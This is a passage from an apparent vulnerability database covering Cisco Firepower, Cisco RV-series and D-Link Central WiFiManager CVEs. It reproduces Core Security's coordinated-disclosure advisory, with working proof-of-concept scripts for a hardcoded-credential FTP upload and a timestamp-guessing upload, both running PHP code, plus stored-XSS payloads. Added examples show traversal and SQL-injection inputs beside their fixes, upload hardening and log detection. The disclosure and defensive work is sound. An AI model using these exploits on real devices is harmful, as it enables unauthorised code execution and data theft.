with FirePOWER Services; ASA 5516-X with FirePOWER Services.
| VAR-201810-0327 | CVE-2018-0453 | Cisco Firepower System Vulnerability related to authorization, authority, and access control in software |
CVSS V2: 7.2 CVSS V3: 8.2 Severity: HIGH |
A vulnerability in the Sourcefire tunnel control channel protocol in Cisco Firepower System Software running on Cisco Firepower Threat Defense (FTD) sensors could allow an authenticated, local attacker to execute specific CLI commands with root privileges on the Cisco Firepower Management Center (FMC), or through Cisco FMC on other Firepower sensors and devices that are controlled by the same Cisco FMC. To send the commands, the attacker must have root privileges for at least one affected sensor or the Cisco FMC. The vulnerability exists because the affected software performs insufficient checks for certain CLI commands, if the commands are executed via a Sourcefire tunnel connection. An attacker could exploit this vulnerability by authenticating with root privileges to a Firepower sensor or Cisco FMC, and then sending specific CLI commands to the Cisco FMC or through the Cisco FMC to another Firepower sensor via the Sourcefire tunnel connection. A successful exploit could allow the attacker to modify device configurations or delete files on the device that is running Cisco FMC Software or on any Firepower device that is managed by Cisco FMC. Cisco Firepower System Software contains a vulnerability related to authorization, permissions, and access control, which may allow information to be obtained or altered, or cause a denial of service (DoS). Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services and the other products listed below are Cisco security devices; Firepower System Software is the firewall operating system used on them.
The following products are affected: Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services; Adaptive Security Appliance (ASA) 5500-X Series Next-Generation Firewalls; FirePOWER 7000 Series Appliances; FirePOWER 8000 Series Appliances; Firepower 4100 Series Security Appliances; Firepower 9300 Series Security Appliances; Firepower Management Center; Firepower Threat Defense; Firepower Threat Defense Virtual (FTDv);
| VAR-201810-0356 | CVE-2018-0405 | Cisco RV180W Wireless-N Multifunction VPN Router and Small Business RV Series RV220W Wireless Network Security Firewall Path traversal vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the web framework code for Cisco RV180W Wireless-N Multifunction VPN Router and Small Business RV Series RV220W Wireless Network Security Firewall could allow an unauthenticated, remote attacker to conduct a directory path traversal attack on a targeted device. The issue is due to improper sanitization of user-supplied input in HTTP request parameters that describe filenames. An attacker could exploit this vulnerability by using directory traversal techniques to submit a path to a desired file location. The Cisco RV180W Wireless-N Multifunction VPN Router is a multi-function VPN router. A directory traversal vulnerability exists in the web framework of the Cisco RV180W Wireless-N Multifunction VPN Router. No further details of the vulnerability are currently available.
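The advisory names the root cause, a filename-describing request parameter that is not sanitized before it is used to locate a file, without giving the code. The following is an added example, not Cisco's code, of that pattern beside the check that closes it: a resolver that joins the parameter under a web root with no containment check, a hardened lexical resolver, and a filesystem-aware variant that also follows symlinks before deciding, since a symlink inside the web root can point out of it and defeat a purely textual check. The web root, paths and file contents are constructed; nothing here targets the real firmware.

```python
"""Added example (not Cisco's code): path traversal via a filename parameter,
the unsafe join beside a confined resolver. Paths and files are constructed."""
import os
import posixpath
import tempfile
from urllib.parse import unquote

WEB_ROOT = "/var/www/htdocs"   # constructed web root for the lexical checks

def resolve_unsafe(param, root=WEB_ROOT):
    """The flawed pattern: decode, join, normalise, never check containment.
    '../' sequences in the parameter walk out of the web root."""
    return posixpath.normpath(posixpath.join(root, unquote(param)))

def resolve_safe(param, root=WEB_ROOT):
    """Decode once, reject NUL bytes, normalise, and require the result to stay under root."""
    decoded = unquote(param)
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root.rstrip("/") + "/"):
        return None
    return candidate

def resolve_safe_fs(param, root):
    """Filesystem-aware variant: after the lexical check, follow symlinks and check again."""
    lexical = resolve_safe(param, root)
    if lexical is None:
        return None
    real_root = os.path.realpath(root)
    real = os.path.realpath(lexical)
    if real != real_root and not real.startswith(real_root + os.sep):
        return None
    return real

def build_constructed_webroot():
    """Constructed tree: <tmp>/www holds index.html and a symlink 'link' that points
    outside the web root at <tmp>/secret, which holds key.txt."""
    base = tempfile.mkdtemp(prefix="trav-")
    www, secret = os.path.join(base, "www"), os.path.join(base, "secret")
    os.makedirs(www)
    os.makedirs(secret)
    with open(os.path.join(www, "index.html"), "w") as f:
        f.write("constructed\n")
    with open(os.path.join(secret, "key.txt"), "w") as f:
        f.write("constructed-secret\n")
    os.symlink(secret, os.path.join(www, "link"))
    return www

if __name__ == "__main__":
    print(resolve_unsafe("../../../etc/passwd"))     # escapes the web root
    print(resolve_safe("../../../etc/passwd"))       # rejected
    www = build_constructed_webroot()
    print(resolve_safe("link/key.txt", www))         # passes the lexical check
    print(resolve_safe_fs("link/key.txt", www))      # rejected once the symlink is followed
```

Decoding exactly once matters: a double-encoded "%252e%252e/" decodes to the literal text "%2e%2e/", which contains no "..", and the filesystem will not decode it again, so it stays confined; decoding in a loop until the string stops changing would reopen the hole.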
| VAR-201810-0355 | CVE-2018-0404 | Cisco RV180W Wireless-N Multifunction VPN Router and Small Business RV Series RV220W Wireless Network Security Firewall In SQL Injection vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the web framework code for Cisco RV180W Wireless-N Multifunction VPN Router and Small Business RV Series RV220W Wireless Network Security Firewall could allow an unauthenticated, remote attacker to execute arbitrary SQL queries. The attacker could retrieve sensitive information which should be restricted. The product has entered the end-of-life phase and no firmware fix will be released. The Cisco RV180W Wireless-N Multifunction VPN Router and the Small Business RV Series RV220W Wireless Network Security Firewall are Cisco products: the RV180W is a router product and the RV220W is a wireless network firewall product. A SQL injection vulnerability exists in the web framework component of both devices.
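The entry states the effect (arbitrary SQL from an unauthenticated request, restricted rows returned) but not the construction error behind it. The following is an added example, not Cisco's code: the query-building mistake that produces this class of bug, shown on an in-memory SQLite table beside the parameterised form. The table, its rows, the "secret" values and the injected parameter are all constructed.

```python
"""Added example (not Cisco's code): SQL injection from string-built queries,
beside the bound-parameter form, on a constructed in-memory SQLite table."""
import sqlite3

def make_constructed_db():
    """In-memory table standing in for a device's user store (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT, secret TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("guest", "guest", "constructed-guest-token"),
        ("admin", "admin", "constructed-admin-token"),
    ])
    return db

def lookup_unsafe(db, name):
    """The flaw: the request parameter is spliced into the SQL text, so a quote
    and a comment marker inside it rewrite the WHERE clause the developer wrote."""
    sql = "SELECT name, secret FROM users WHERE name = '%s' AND role = 'guest'" % name
    return db.execute(sql).fetchall()

def lookup_safe(db, name):
    """The fix: a bound parameter is data, never grammar, whatever characters it holds."""
    sql = "SELECT name, secret FROM users WHERE name = ? AND role = 'guest'"
    return db.execute(sql, (name,)).fetchall()

# Constructed attacker-controlled parameter: closes the string, ORs in the admin
# row, and comments out the role restriction that was meant to apply.
INJECTION = "x' OR role = 'admin' --"

if __name__ == "__main__":
    db = make_constructed_db()
    print("unsafe:", lookup_unsafe(db, INJECTION))   # returns the admin row
    print("safe:  ", lookup_safe(db, INJECTION))     # returns nothing
```

The unsafe query the device would actually run is SELECT name, secret FROM users WHERE name = 'x' OR role = 'admin' --' AND role = 'guest': the role check is now inside a comment. With the bound form the same bytes are compared against the name column as a whole string and match nothing.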
| VAR-201810-0329 | CVE-2018-0455 | Cisco Firepower System Software data processing vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the Server Message Block Version 2 (SMBv2) and Version 3 (SMBv3) protocol implementation for the Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause the device to run low on system memory, possibly preventing the device from forwarding traffic. It is also possible that a manual reload of the device may be required to clear the condition. The vulnerability is due to incorrect SMB header validation. An attacker could exploit this vulnerability by sending a custom SMB file transfer through the targeted device. A successful exploit could cause the device to consume an excessive amount of system memory and prevent the SNORT process from forwarding network traffic. This vulnerability can be exploited using either IPv4 or IPv6 in combination with SMBv2 or SMBv3 network traffic. Cisco Firepower System Software contains a data processing vulnerability that could result in a denial of service (DoS). Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services and related products are Cisco security devices; Firepower System Software is the firewall operating system they run. The following products are affected: Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services; Adaptive Security Appliance (ASA) 5500-X Series Next-Generation Firewalls; Advanced Malware Protection (AMP) for Networks, 7000 Series Appliances; Advanced Malware Protection (AMP) for Networks,
| VAR-201810-0846 | CVE-2018-17440 | D-Link Central WiFi Manager unrestricted upload of dangerous file types vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. They expose an FTP server that serves by default on port 9000 and has hardcoded credentials (admin, admin). Taking advantage of this, a remote unauthenticated attacker could execute arbitrary PHP code by uploading any file in the web root directory and then accessing it via a request. D-Link Central WiFi Manager contains an unrestricted upload of dangerous file type vulnerability. Successful exploitation could allow information to be obtained or altered, or cause a denial of service (DoS).
1. *Advisory Information*
Title: D-Link Central WiFiManager Software Controller Multiple
Vulnerabilities
Advisory ID: CORE-2018-0010
Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities
Date published: 2018-10-04
Date of last update: 2018-10-04
Vendors contacted: D-Link
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Unrestricted Upload of File with Dangerous Type [CWE-434],
Improper Authorization [CWE-285], Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper
Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441
3. *Vulnerability Description*
D-Link's website states that:
[1] Central WiFiManager Software Controller helps network administrators
streamline their wireless access point (AP) management workflow. Central
WiFiManager is an innovative approach to the more traditional
hardware-based multiple access point management system. It uses a
centralized server to both remotely manage and monitor wireless APs on a
network.
Vulnerabilities were found in the Central WiFiManager Software
Controller, allowing unauthenticated and authenticated file upload with
dangerous type that could lead to remote code execution with system
permissions. Also, two stored Cross Site Scripting vulnerabilities were
found.
4. *Vulnerable Packages*
. Central WifiManager v1.03
Other products and versions might be affected, but they were not tested.
5. *Vendor Information, Solutions and Workarounds*
D-Link released the following Beta version that addresses the reported vulnerabilities:
. Central WifiManager v 1.03r0100-Beta1
In addition, D-Link published a security note in:
https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092
6. *Credits*
These vulnerabilities were discovered and researched by Julian Munoz
from Core Security Consulting Services. The publication of this advisory
was coordinated by Leandro Cuozzo from Core Advisories Team.
7. *Technical Description / Proof of Concept Code*
D-Link Central WiFiManager Software Controller exposes an FTP server
that serves by default on port 9000 and has hardcoded credentials
(admin, admin).
In 7.2 we show a similar attack, but in this case with an
authenticated user in the web application. The application has a
functionality to upload a .rar file used for the captive portal
displayed by the Access Points. We will craft a .rar with a PHP file
that we will end up executing in the context of the web application.
When the .rar is uploaded it is stored in the path "\web\captivalportal"
in a folder with a timestamp created by the PHP time() function. To
learn the web server's time we request an information file that
contains the time we are looking for. Once we have the server's time
we upload the .rar, calculate the proper epoch and request the
appropriate path, increasing this epoch by one until we hit the correct
one.
Finally, we discovered two stored Cross-Site Scripting vulnerabilities,
one in the update site functionality, in the 'sitename' parameter (7.3),
and the other in the creation of a local user, in the 'username'
parameter (7.4).
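The root cause shared by 7.1 and 7.2 is that uploaded content is written, unfiltered, into a directory the web server treats as executable, under a path that is either fixed or derived from time(). The following added example (not code from the Core Security advisory or from D-Link's product) sketches how an upload handler can refuse such archives: it allowlists extensions, rejects traversal and non-regular members before extracting anything, and stores the result under a random directory name rather than a timestamp, so a stored path cannot be guessed from the server clock. The allowlist, the size limits, the function names and the constructed sample archives are assumptions for illustration.

```python
"""Hardened archive-upload handling (mitigation sketch for CWE-434).

Added example, not code from the Core Security advisory or from D-Link
Central WiFiManager. Allowlist, limits and storage layout are assumptions.
"""
import io
import os
import posixpath
import secrets
import tarfile
import tempfile

# Assumption: a captive-portal bundle only needs static assets, so server-side
# script extensions (.php, .phtml, .php5, ...) are simply not on the list.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".css", ".html"}
MAX_MEMBERS = 200                    # refuse archive bombs by member count
MAX_MEMBER_BYTES = 5 * 1024 * 1024   # and by declared member size


class UploadRejected(ValueError):
    """Raised when an upload fails validation; nothing has been written."""


def safe_member_name(name):
    """Normalise an archive member path; reject traversal and disallowed types."""
    norm = posixpath.normpath(name.replace("\\", "/"))
    if norm.startswith("/") or ".." in norm.split("/") or norm in ("", "."):
        raise UploadRejected("unsafe path in archive: %r" % name)
    if posixpath.splitext(norm)[1].lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected("disallowed file type: %r" % name)
    return norm


def validate_archive(data):
    """Return {member_name: safe_relative_path} for every regular file, or raise.

    The whole archive is checked before anything is extracted, so one bad
    member (a .php file, a ../ path, a symlink) rejects the entire upload.
    """
    try:
        tf = tarfile.open(fileobj=io.BytesIO(data), mode="r:*")
    except tarfile.TarError as exc:
        raise UploadRejected("not a valid tar archive: %s" % exc)
    accepted = {}
    with tf:
        members = tf.getmembers()
        if len(members) > MAX_MEMBERS:
            raise UploadRejected("too many archive members")
        for m in members:
            if m.isdir():
                continue  # directories are recreated implicitly on extraction
            if not m.isfile():
                raise UploadRejected("non-regular member: %r" % m.name)
            if m.size > MAX_MEMBER_BYTES:
                raise UploadRejected("member too large: %r" % m.name)
            accepted[m.name] = safe_member_name(m.name)
    return accepted


def store_upload(data, root):
    """Validate, then extract into an unguessable directory under root.

    The directory name is random rather than time()-derived, so the stored
    path cannot be predicted from the server's clock.
    """
    accepted = validate_archive(data)
    dest = os.path.join(root, secrets.token_urlsafe(16))
    os.makedirs(dest)
    written = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
        for m in tf.getmembers():
            if m.name not in accepted:
                continue
            target = os.path.join(dest, *accepted[m.name].split("/"))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with tf.extractfile(m) as src, open(target, "wb") as dst:
                dst.write(src.read())  # explicit copy; no extractall()
            written.append(accepted[m.name])
    return dest, sorted(written)


def build_tar(files):
    """Build a tar in memory from {name: bytes}; used to construct sample uploads."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def try_store(files):
    """Store a constructed upload in a fresh temp dir; return ("accepted", paths) or ("rejected", why)."""
    root = tempfile.mkdtemp(prefix="uploads_")
    try:
        _, written = store_upload(build_tar(files), root)
        return ("accepted", written)
    except UploadRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    # Constructed samples: a PHP member, a traversal member, a benign bundle.
    print(try_store({"poc.php": b"<?php echo 'x'; ?>"}))
    print(try_store({"logo.png": b"\x89PNG", "../evil.png": b"x"}))
    print(try_store({"logo.png": b"\x89PNG", "css/site.css": b"body{}"}))
```

The check runs over the full member list before the first byte is written, which is what makes the reject-on-any-failure behaviour meaningful; extracting member by member and validating as you go would leave a half-written directory behind on failure.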
7.1.
/-----
import requests
from ftplib import FTP

# establish connection with FTP server
host_ip = "127.0.0.1"
ftp = FTP()
ftp.connect(host=host_ip, port=9000)
ftp.login("admin", "admin")
data = []

# create PHP poc file
with open("poc.php", "w+") as poc_php_file:
    poc_php_file.write("<?php\nsystem('whoami');\n?>")

# upload PHP poc file
with open("poc.php", "rb") as php_file:
    ftp.cwd('/web/public')
    ftp.storbinary("STOR write_file.php", php_file)
ftp.dir(data.append)
ftp.quit()

for line in data:
    print("-", line)

session = requests.Session()
session.trust_env = False

# get the uploaded file for remote code execution
get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False)
print(get_uploaded_file.text)
-----/
7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type*
[CVE-2018-17442] In this case we make a file upload using the
functionality given by the onUploadLogPic endpoint, which takes a
.rar file, decompresses it and stores it in a folder named after the PHP
time() function. Our goal is first to obtain the server's time, upload a
.rar with our PHP file, calculate the proper epoch and iterate,
increasing it until we hit the proper one and remote code execution is
achieved.
/-----
import re
import time
import requests
import datetime
import tarfile

def parse_to_datetime(date_string):
    # expects "YYYY-MM-DD HH:MM:SS" as found in the exported report
    date_list = date_string.split("-")
    td = date_list[2][2:].split(":")
    return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),
                             int(td[0]), int(td[1]), int(td[2]))

session = requests.Session()
session.trust_env = False
php_session_id = "96sml0e9soke02k6d672oumqq4"  # example (insert here the proper session id)
cookie = {'PHPSESSID': php_session_id}

# create tar file to upload.
with open("poc.php", "w+") as poc_php_file:
    poc_php_file.write("<?php\nsystem('whoami');\n?>")
with tarfile.open("poc_tar_file.tar", mode="w") as poc_tar_file:
    poc_tar_file.add("poc.php")

# get server datetime.
get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT',
                                                  cookies=cookie, verify=False)
date = re.search(r"Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '')

# generate epoch from server's date
epoch = int(time.mktime(parse_to_datetime(date).timetuple()))

# upload attack PHP file.
attack_tar_file = "poc_tar_file.tar"
with open(attack_tar_file, 'rb') as logfile:
    tar_file = {'stylename': 'attack', 'logfile': logfile}
    restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic',
                                           files=tar_file,
                                           cookies=cookie, verify=False)

for i in range(0, 20):
    # get the uploaded file named after time epoch, returned by PHP time() function.
    filename = str(epoch) + "/" + "poc.php"
    get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' % filename, verify=False)
    if get_uploaded_file.status_code == 200:
        print("Remote Code Execution Achieved")
        print(get_uploaded_file.text)
        break
    epoch += 1
-----/
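From the defender's side, both proof-of-concept scripts leave a recognisable trace in the web server's access log: requests for .php files under /public/ or /captivalportal/, and, for the authenticated path, a run of requests for consecutive epoch-named directories while the client hunts for the right time() value. The following added example (not part of the Core Security advisory) flags both patterns; the log lines are constructed in Apache combined format and are not taken from a real device, and the regexes, threshold and rule names are assumptions.

```python
"""Access-log detection for the post-upload access patterns described in 7.1/7.2.

Added example, not part of the Core Security advisory. The sample log lines
are constructed; only the path prefixes /public/ and /captivalportal/ come
from the advisory.
"""
import re
from collections import defaultdict

# Apache/nginx "combined" shape: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Directories where uploaded content is served; a script request there is the tell-tale.
SERVED_UPLOAD_DIRS = ("/public/", "/captivalportal/")
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\?|$)", re.I)

# The authenticated PoC walks /captivalportal/<epoch>/<file> for successive epochs.
EPOCH_DIR_RE = re.compile(r"^/captivalportal/(\d{9,10})/")
PROBE_THRESHOLD = 5  # assumption: this many consecutive epoch dirs from one client is a hunt


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse(lines):
    """Return a list of (client_ip, rule, detail) findings over the given log lines."""
    findings = []
    probes = defaultdict(set)  # client ip -> epoch-like directory names it requested
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        path = rec["path"]
        # Rule 1: any server-side script fetched from an upload directory.
        if path.startswith(SERVED_UPLOAD_DIRS) and SCRIPT_EXT_RE.search(path):
            findings.append((rec["ip"], "script_in_upload_dir",
                             "%s -> %d" % (path, rec["status"])))
        # Rule 2 (collect): epoch-named directory probes per client.
        m = EPOCH_DIR_RE.match(path)
        if m:
            probes[rec["ip"]].add(int(m.group(1)))
    for ip, epochs in probes.items():
        # A consecutive run of N distinct epochs spans exactly N-1 seconds.
        if len(epochs) >= PROBE_THRESHOLD and max(epochs) - min(epochs) == len(epochs) - 1:
            findings.append((ip, "sequential_epoch_probe",
                             "%d consecutive directories %d..%d"
                             % (len(epochs), min(epochs), max(epochs))))
    return findings


def summarise(findings):
    """Map each client ip to the set of rules it triggered."""
    by_ip = defaultdict(set)
    for ip, rule, _detail in findings:
        by_ip[ip].add(rule)
    return dict(by_ip)


# Constructed sample log (not from a real device). 198.51.100.7 plays the
# authenticated PoC, 203.0.113.5 the FTP-upload PoC, 192.0.2.10 a normal user.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Oct/2018:10:00:01 +0000] "GET /index.php/Login HTTP/1.1" 200 1043',
    '198.51.100.7 - - [04/Oct/2018:10:00:09 +0000] "GET /captivalportal/1538647200/poc.php HTTP/1.1" 404 215',
    '198.51.100.7 - - [04/Oct/2018:10:00:09 +0000] "GET /captivalportal/1538647201/poc.php HTTP/1.1" 404 215',
    '198.51.100.7 - - [04/Oct/2018:10:00:09 +0000] "GET /captivalportal/1538647202/poc.php HTTP/1.1" 404 215',
    '198.51.100.7 - - [04/Oct/2018:10:00:10 +0000] "GET /captivalportal/1538647203/poc.php HTTP/1.1" 404 215',
    '198.51.100.7 - - [04/Oct/2018:10:00:10 +0000] "GET /captivalportal/1538647204/poc.php HTTP/1.1" 200 38',
    '203.0.113.5 - - [04/Oct/2018:10:01:30 +0000] "GET /public/write_file.php HTTP/1.1" 200 38',
    '192.0.2.10 - - [04/Oct/2018:10:02:00 +0000] "GET /captivalportal/1538640000/logo.png HTTP/1.1" 200 4821',
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Rule 1 fires even when the response is 404, which is deliberate: a client asking for .php files under an asset directory is worth a look whether or not the file existed, and the 404-then-200 sequence is exactly what the epoch hunt looks like.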
7.3. *Cross-Site Scripting in the application site name parameter*
[CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is
vulnerable to stored Cross-Site Scripting.
The following is a proof of concept to demonstrate the vulnerability:
/-----
POST /index.php/Config/UpdateSite HTTP/1.1
Host: 10.2.45.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.220/index.php/Config/CreatSite
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1
-----/
7.4. *Cross-Site Scripting in the creation of a new user*
[CVE-2018-17441] The 'username' parameter of the addUser endpoint is
vulnerable to stored Cross-Site Scripting.
The following is a proof of concept to demonstrate the vulnerability:
/-----
POST /index.php/System/addUser HTTP/1.1
Host: 10.2.45.220
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.220/index.php/System/userManager
Content-Type: application/x-www-form-urlencoded;
Content-Length: 96
Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;
PHPSESSID=4fvbnmn343424rg8m1jg3qbc05
Connection: close
username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change&
-----/
8. *Report Timeline*
2018-06-04: Core Security sent an initial notification to D-Link,
including a draft advisory.
2018-06-06: D-Link confirmed the reception of the advisory and informed
that they would have an initial response on 06/08.
2018-06-08: D-Link informed that they would provide a schedule for the
fixes on 06/13.
2018-06-08: Core Security thanked D-Link for the update.
2018-06-14: D-Link informed its plan of remediation and notified Core
Security that the fixed version will be available on 08/31.
2018-06-15: Core Security thanked D-Link for the update and proposed to
keep in regular contact until this tentative release date.
2018-07-23: Core Security requested a status update.
2018-07-25: D-Link answered saying that they are still targeting 08/31
as the release date.
2018-08-24: Core Security requested a new status update and a solidified
release date for the fixed version.
2018-08-28: D-Link sent a beta version for test.
2018-08-30: Core Security tested the beta version and requested D-Link
to coordinate a release date.
2018-09-21: D-Link informed that they were planning a security
announcement and they were ready to schedule a disclosure date.
2018-09-24: Core Security thanked D-Link for the update and proposed
October 4th as the publication date.
2018-10-04: Advisory CORE-2018-0010 published.
9. *References*
[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/.
10. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security*
Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.
Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com
12. *Disclaimer*
The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201810-0848 | CVE-2018-17442 | D-Link Central WiFi Manager unrestricted upload of dangerous file types vulnerability |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. An unrestricted file upload vulnerability in the onUploadLogPic endpoint allows remote authenticated users to execute arbitrary PHP code. D-Link Central WiFi Manager contains an unrestricted upload of dangerous file type vulnerability. Successful exploitation could allow information to be obtained or altered, or cause a denial of service (DoS). The source advisory, CORE-2018-0010 (D-Link Central WiFiManager Software Controller Multiple Vulnerabilities, Core Security, published 2018-10-04), is reproduced in full under VAR-201810-0846 above; the authenticated upload issue is its section 7.2.